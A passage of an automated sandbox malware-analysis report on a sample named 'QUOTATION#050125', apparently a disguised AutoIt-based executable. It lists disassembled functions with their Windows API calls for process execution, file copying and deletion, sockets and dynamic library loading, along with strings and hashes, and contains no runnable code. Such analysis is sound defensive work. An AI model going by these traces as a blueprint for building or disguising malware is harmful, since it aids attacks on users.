                                                                                      • Instruction ID: baa187ed3fcc7da20255eaa633f5c4631003cac80c956213d8170fe21f57eca3
                                                                                      • Opcode Fuzzy Hash: 124258f990786b5006f0789320414b35a9d1bd627235b333dd6d02f767384380
                                                                                      • Instruction Fuzzy Hash: 1D910471D0021DAFDF14DFA4D891EEEB7B9BF08314F108169E915BB291EB349A458FA0
                                                                                      Function 00148CD3 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 193COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CharLowerBuffW.USER32(?,?,00000000,?), ref: 00148CF3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: BuffCharLower
                                                                                      • String ID: cdecl$none$stdcall$winapi
                                                                                      • API String ID: 2358735015-567219261
                                                                                      • Opcode ID: 529fce010819f0901a7c7c537ecda959fbbcf596872a6b4daf42c90e3193fd42
                                                                                      • Instruction ID: 37b8f98a9e250c87da76ce246a956fe6c76d74ab0641e8e85e6da8600c6f535a
                                                                                      • Opcode Fuzzy Hash: 529fce010819f0901a7c7c537ecda959fbbcf596872a6b4daf42c90e3193fd42
                                                                                      • Instruction Fuzzy Hash: 82519F31A011169BCB24EFACC9509BEB7A5BF64724B214229E826F72D5EF31DE41C790
                                                                                      Function 0014AD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ShellExecuteExW.SHELL32(0000003C), ref: 0014AEA3
                                                                                      • GetProcessId.KERNEL32(00000000), ref: 0014AF38
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0014AF67
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseExecuteHandleProcessShell
                                                                                      • String ID: <$@
                                                                                      • API String ID: 1279613386-1426351568
                                                                                      • Opcode ID: 3804cf9ad04576b4bbcbbd3b2671222b181a1e593b2f68f444f4b5a2ccbf90a1
                                                                                      • Instruction ID: 4df0c0bd07eb5199abf6723ce891d0f79aed648646556e079d7c9c484ac3a949
                                                                                      • Opcode Fuzzy Hash: 3804cf9ad04576b4bbcbbd3b2671222b181a1e593b2f68f444f4b5a2ccbf90a1
                                                                                      • Instruction Fuzzy Hash: 55713671A00619DFCB14DFA4C494A9EBBF0BF08314F458499E85AAB3A2CB74ED45CB91
                                                                                      Function 0012B5C8 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 142COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CharUpperBuffW.USER32(?,?), ref: 0012B5FC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: BuffCharUpper
                                                                                      • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                      • API String ID: 3964851224-769500911
                                                                                      • Opcode ID: b53632d311ad8e95ef8a9045ac252e67e1e1828d94205ee387cd560b13aaa189
                                                                                      • Instruction ID: d3bcebea20d4e0d57a056aa1387da062dee46b0589d058004ca93f7bf07b3795
                                                                                      • Opcode Fuzzy Hash: b53632d311ad8e95ef8a9045ac252e67e1e1828d94205ee387cd560b13aaa189
                                                                                      • Instruction Fuzzy Hash: A241F632A081379BCB206F7DD9D05BE77A5BFA0B54B254229E422EB285F731CD91C790
                                                                                      Function 0012719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00127206
                                                                                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0012723C
                                                                                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0012724D
                                                                                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 001272CF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                      • String ID: DllGetClassObject
                                                                                      • API String ID: 753597075-1075368562
                                                                                      • Opcode ID: 4c7d089a5a43afb730991e3d03fca9889e427647f05770959e7ed69fa644129e
                                                                                      • Instruction ID: ea06b45cceb865e3fcc751193150c9aa5a36d6fcaaf98972d9639ec9bf0ad0c6
                                                                                      • Opcode Fuzzy Hash: 4c7d089a5a43afb730991e3d03fca9889e427647f05770959e7ed69fa644129e
                                                                                      • Instruction Fuzzy Hash: 2F418D71A04314EFDB15DF94D884A9B7BA9EF44310F1580ADFD059F28AD7B0DA54CBA0
                                                                                      Function 00153D7C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00153E35
                                                                                      • IsMenu.USER32(?), ref: 00153E4A
                                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00153E92
                                                                                      • DrawMenuBar.USER32 ref: 00153EA5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Menu$Item$DrawInfoInsert
                                                                                      • String ID: 0
                                                                                      • API String ID: 3076010158-4108050209
                                                                                      • Opcode ID: 02c9707213547990d139bce0d474604eb65136777bb78c4fa628e9b78e1877b9
                                                                                      • Instruction ID: 355f451538e805bcef36b6b3d8ed9b624f86abd859623a73a440746569fc543d
                                                                                      • Opcode Fuzzy Hash: 02c9707213547990d139bce0d474604eb65136777bb78c4fa628e9b78e1877b9
                                                                                      • Instruction Fuzzy Hash: 4E414B75A00209EFDB10DF90D885ADAB7F5FF45395F044119ED259B250D770AE49CF60
                                                                                      Function 00121DE2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00123CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00123CCA
                                                                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00121E66
                                                                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00121E79
                                                                                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 00121EA9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$ClassName
                                                                                      • String ID: ComboBox$ListBox
                                                                                      • API String ID: 787153527-1403004172
                                                                                      • Opcode ID: 26e859497c96afd96059c015b20846cc621ac246e95d9ca9a42a0f125f3d5d39
                                                                                      • Instruction ID: 0dfe07e80e0a6f97bc40a34681ee27f0abeb09d656032219bad99f8529e5816e
                                                                                      • Opcode Fuzzy Hash: 26e859497c96afd96059c015b20846cc621ac246e95d9ca9a42a0f125f3d5d39
                                                                                      • Instruction Fuzzy Hash: 97213771A00204BEDB15EF64EC46DFFB7B9DF51350B104129F825A72E1DB344E198660
                                                                                      Function 00152F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00152F8D
                                                                                      • LoadLibraryW.KERNEL32(?), ref: 00152F94
                                                                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00152FA9
                                                                                      • DestroyWindow.USER32(?), ref: 00152FB1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                      • String ID: SysAnimate32
                                                                                      • API String ID: 3529120543-1011021900
                                                                                      • Opcode ID: 122bd3a2a809ea87c891ee54c3af20e8a154fd758d893b3536095fde197c2b4d
                                                                                      • Instruction ID: 389de86050da0f9a3bca4032f24ae50f2ec102d12e73f85930583d50dc92c913
                                                                                      • Opcode Fuzzy Hash: 122bd3a2a809ea87c891ee54c3af20e8a154fd758d893b3536095fde197c2b4d
                                                                                      • Instruction Fuzzy Hash: BD218C72204205EFEB104F64EC80FBB77B9EB5A366F10461AFD60EA190D771DC959BA0
                                                                                      Function 000E4D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,000E4D1E,000F28E9,?,000E4CBE,000F28E9,001888B8,0000000C,000E4E15,000F28E9,00000002), ref: 000E4D8D
                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 000E4DA0
                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,000E4D1E,000F28E9,?,000E4CBE,000F28E9,001888B8,0000000C,000E4E15,000F28E9,00000002,00000000), ref: 000E4DC3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                      • API String ID: 4061214504-1276376045
                                                                                      • Opcode ID: 815151d89a7262a063c734d64d7b94252e95c97a0a8e65b41e7edd5e962f6314
                                                                                      • Instruction ID: ee8fab756560f035d0085d820fefc488cd6f3517e21776bdb18887f96e6e5a0c
                                                                                      • Opcode Fuzzy Hash: 815151d89a7262a063c734d64d7b94252e95c97a0a8e65b41e7edd5e962f6314
                                                                                      • Instruction Fuzzy Hash: F5F03C35A40308EFDB519F95DC49BEEBBE5EB44752F0400A8B805A6660CB705A90CBD1
                                                                                      Function 000C4E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?,000C4EDD,?,00191418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 000C4E9C
                                                                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 000C4EAE
                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,000C4EDD,?,00191418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 000C4EC0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                      • API String ID: 145871493-3689287502
                                                                                      • Opcode ID: a0f85571bacb0a5e79c359c664a37c3faca91c8b3935156194439a4a1bf8f02f
                                                                                      • Instruction ID: e3f24cfd7a567f062b6165b5c94018558f3d86b975c2117652ee9631353ce635
                                                                                      • Opcode Fuzzy Hash: a0f85571bacb0a5e79c359c664a37c3faca91c8b3935156194439a4a1bf8f02f
                                                                                      • Instruction Fuzzy Hash: F8E08635A01B22DFD2611F256C68F5F6694BF81F637060119FC00E6500DB60CD4185E0
                                                                                      Function 000C4E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00103CDE,?,00191418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 000C4E62
                                                                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 000C4E74
                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00103CDE,?,00191418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 000C4E87
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                      • API String ID: 145871493-1355242751
                                                                                      • Opcode ID: e1054590682e83da9de697bd410757d6d10383af70c5c25bfc9033345f443d6c
                                                                                      • Instruction ID: 10aa7ec4febd8ac90c766e34783451489792b0b410ce4231648e2aa4bf08586d
                                                                                      • Opcode Fuzzy Hash: e1054590682e83da9de697bd410757d6d10383af70c5c25bfc9033345f443d6c
                                                                                      • Instruction Fuzzy Hash: 2FD01235502B21DF96621F297C28ECF6A58BF85F523060519BD05AA555CF60CE41C5D0
                                                                                      Function 00132947 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00132C05
                                                                                      • DeleteFileW.KERNEL32(?), ref: 00132C87
                                                                                      • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00132C9D
                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00132CAE
                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00132CC0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$Delete$Copy
                                                                                      • String ID:
                                                                                      • API String ID: 3226157194-0
                                                                                      • Opcode ID: a49d38c344c6bf9e47f5733c04ac894020272b7b3c1a95ce555c8ec04c78caf2
                                                                                      • Instruction ID: 5db6f64145b6b56708e248a67074fe9f27521201156035cde84fd611e3f5d900
                                                                                      • Opcode Fuzzy Hash: a49d38c344c6bf9e47f5733c04ac894020272b7b3c1a95ce555c8ec04c78caf2
                                                                                      • Instruction Fuzzy Hash: 38B12E71900219AFDF25EBA4CC85EDEB77DEF49350F1040A6F509E6156EB30AA448F61
                                                                                      Function 000F8D45 Relevance: 7.8, APIs: 5, Instructions: 300COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0ec8ee899dee97235725bf44d8dcb8f850b44b6e7ac0465fc1b90593e07ca45a
                                                                                      • Instruction ID: f4620254c9cda82750f10020c4ea78bdfd56a5575b2e9d3cc398cde1e1b3ec0a
                                                                                      • Opcode Fuzzy Hash: 0ec8ee899dee97235725bf44d8dcb8f850b44b6e7ac0465fc1b90593e07ca45a
                                                                                      • Instruction Fuzzy Hash: 84C1F175A0434DAFCB61DFA9D841BFDBBF0AF09310F044099EA14A7792CB359941EB60
                                                                                      Function 00141C60 Relevance: 7.8, APIs: 5, Instructions: 298networkCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00141DC0
                                                                                      • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00141DE1
                                                                                      • WSAGetLastError.WSOCK32 ref: 00141DF2
                                                                                      • inet_ntoa.WSOCK32(?), ref: 00141E8C
                                                                                        • Part of subcall function 00143224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,0013EC0C), ref: 00143240
                                                                                      • htons.WSOCK32(?,?,?,?,?), ref: 00141EDB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                      • String ID:
                                                                                      • API String ID: 3163710072-0
                                                                                      • Opcode ID: 0cc926976326822579bbc6959a363fb6f0b14ef49ff0b9b03440283b57308351
                                                                                      • Instruction ID: cbd6dc7f555b5a915e67b9d0b6c82afc9ab13416b652a2b1cd94d2045a0abd26
                                                                                      • Opcode Fuzzy Hash: 0cc926976326822579bbc6959a363fb6f0b14ef49ff0b9b03440283b57308351
                                                                                      • Instruction Fuzzy Hash: CFB1DD71604340AFC324DF24C895F6A7BA5AF84318F94895CF45A5B2E3DB31ED8ACB91
                                                                                      Function 00101522 Relevance: 7.8, APIs: 5, Instructions: 268COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,001017FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 001015CE
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,001017FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00101651
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,001017FB,?,001017FB,00000000,00000000,?,00000000,?,?,?,?), ref: 001016E4
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,001017FB,00000000,00000000,?,00000000,?,?,?,?), ref: 001016FB
                                                                                        • Part of subcall function 000F3820: RtlAllocateHeap.NTDLL(00000000,?,00191444,?,000DFDF5,?,?,000CA976,00000010,00191440,000C13FC,?,000C13C6,?,000C1129), ref: 000F3852
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,001017FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00101777
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWide$AllocateHeapInfo
                                                                                      • String ID:
                                                                                      • API String ID: 1443698708-0
                                                                                      • Opcode ID: 90bfda338b1ba8e6eaa45d6083ba38386e030a2d4301080a893419cf339ac5a6
                                                                                      • Instruction ID: f8be285625cee7443e95183db45a9465af8db08009a14df5df5d36f5144d9a75
                                                                                      • Opcode Fuzzy Hash: 90bfda338b1ba8e6eaa45d6083ba38386e030a2d4301080a893419cf339ac5a6
                                                                                      • Instruction Fuzzy Hash: 8391B872E00216BEDB248EB4CC81AFE7BB5AF49710F184659E941EB1C1DBB9DD40CB60
                                                                                      Function 0014A387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCurrentProcessId.KERNEL32 ref: 0014A427
                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0014A435
                                                                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0014A468
